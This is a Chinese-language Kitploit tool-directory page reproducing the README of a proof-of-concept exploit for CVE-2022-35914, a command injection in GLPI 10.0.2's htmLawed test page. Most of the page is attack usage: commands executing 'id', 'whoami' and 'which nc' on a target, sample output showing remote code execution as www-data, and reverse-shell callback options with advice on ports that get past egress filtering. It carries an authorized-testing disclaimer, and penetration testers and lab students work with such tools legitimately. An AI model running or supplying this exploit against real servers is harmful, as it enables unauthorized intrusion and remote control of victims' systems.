Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-35914-RCE — CVE-2022-35914 的 PoC 漏洞利用程序 — GLPI v.10.0.2 htmLawed 命令注入、命令执行及反向 Shell 支持。 | Kitploit
工具/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

CVE-2022-35914 的 PoC 漏洞利用程序 — GLPI v.10.0.2 htmLawed 命令注入、命令执行及反向 Shell 支持。

查看仓库
141个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-35914 by cyb3rk0ala

针对 CVE-2022-35914 的 PoC,这是一个涉及存在漏洞的 GLPI 安装中 htmLawed 测试组件的命令注入漏洞。

该工具通过存在漏洞的端点提供命令执行功能,并包含用于授权实验环境的可选回调功能。

免责声明: 本项目仅供授权安全测试、CTF、OffSec/PG 实验环境以及教育目的使用。请勿在未经明确授权的系统上使用。


漏洞

字段详情
CVECVE-2022-35914
软件GLPI v.10.0.2
组件htmLawed
存在漏洞的端点/vendor/htmlawed/htmlawed/htmLawedTest.php

在受影响的安装中,存在漏洞的组件可能允许通过构造的参数执行命令。


功能

  • 命令执行
  • 自动构造目标 URL
  • 可配置的目标 HTTP 端口
  • 自动获取会话/令牌
  • 命令输出提取
  • 目标检查
  • 自定义 User-Agent 支持
  • 可选回调配置
  • 彩色终端输出
  • Python 3 CLI 界面

环境要求

Python 3 及所需依赖。

Kali Linux

sudo apt install python3-requests python3-bs4

虚拟环境

python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

安装

克隆仓库:

git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

使脚本可执行:

chmod +x glpi.py

使用方法

帮助

python3 glpi.py -h

基本命令执行

python3 glpi.py -u TARGET_IP -c 'id'

示例输出:

[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

命令执行

-c 选项指定要执行的命令。

当前用户

python3 glpi.py -u TARGET_IP -c 'whoami'

当前权限

python3 glpi.py -u TARGET_IP -c 'id'

操作系统

python3 glpi.py -u TARGET_IP -c 'uname -a'

可用工具

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

选项

选项描述默认值
-u, --url目标 URL 或 IP 地址必填
-c, --cmd要执行的命令id
--check检查目标而不执行命令禁用
--user-agent自定义 HTTP User-Agent默认
-p, --rport目标 HTTP 服务端口80
-l, --lhost回调/监听 IP 地址—
-lp, --lport回调/监听端口—

目标端口

-p / --rport 选项指定存在漏洞的 GLPI Web 服务所运行的端口。

默认:

80

示例:

python3 glpi.py -u TARGET_IP -p 80 -c 'id'

目标检查

使用 --check 可在不执行命令的情况下验证 htmLawed 测试页面是否可访问:

python3 glpi.py -u TARGET_IP --check

自定义 User-Agent

可通过以下方式提供自定义 HTTP User-Agent:

python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

反向 Shell

该脚本支持可选的回调参数:

-l   Callback/listener IP
-lp  Callback/listener port

示例:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

在此示例中:

Target:   TARGET_IP:80
Callback: LHOST:80

这两个端口具有不同的用途:

-p   = Target GLPI HTTP port
-lp  = Callback/listener port

OffSec 实验环境说明

在 OffSec 实验环境中测试时,回调通过 TCP 端口 80 成功工作。

其他回调端口(例如 4444)可能会因实验网络和出站过滤而超时。

对于所测试的环境:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

监听器配置在 Kali VPN 接口上,使用 TCP 端口 80。

重要: 使用端口 80 进行回调是特定于该环境的观察结果。这不是 CVE-2022-35914 的要求。


故障排除

命令执行正常但回调失败

首先验证命令执行:

python3 glpi.py -u TARGET_IP -c 'id'

检查所需工具是否存在:

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

如果命令执行正常但回调超时,请检查 VPN 路由和回调端口。


命令输出看起来不正确

如果命令输出解析失败,完整的 HTTP 响应会保存到:

/tmp/glpi.html

使用以下命令检查:

less /tmp/glpi.html

或:

mousepad /tmp/glpi.html

示例工作流程

1. 检查目标

python3 glpi.py \
    -u TARGET_IP \
    --check

2. 确认命令执行

python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. 识别当前用户

python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. 检查可用工具

python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. 配置回调

对于所测试的 OffSec 实验环境:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

免责声明

本项目仅供教育和授权安全测试目的提供。

作者不对涉及本软件的任何滥用、损害、未经授权的访问或非法活动负责。

在测试系统之前,请务必获得明确授权。


作者

cyb3rk0ala


CVE

CVE-2022-35914


项目

CVE-2022-35914 by cyb3rk0ala

下载工具